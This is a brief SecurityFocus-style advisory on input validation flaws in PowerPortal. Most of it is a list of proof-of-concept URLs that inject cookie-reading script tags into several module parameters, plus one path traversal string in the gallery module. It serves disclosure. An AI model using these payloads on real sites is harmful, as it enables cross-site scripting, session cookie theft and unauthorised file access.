PowerPortal Multiple Input Validation Vulnerabilities

The following examples are available:
http://www.example.com/modules.php?name=private_messages&file=reply&id='><script>alert(document.cookie);</script>
http://www.example.com/modules.php?name=links&search=<script>alert(document.cookie);</script>&func=search_results
http://www.example.com/modules.php?name=content&file=search&search=<script>alert(document.cookie);</script>&func=results
http://www.example.com/modules.php?name=gallery&files=<script>alert(document.cookie);</script>
http://www.example.com/modules.php?name=gallery&files=/../../../


 

Privacy Statement
Copyright 2010, SecurityFocus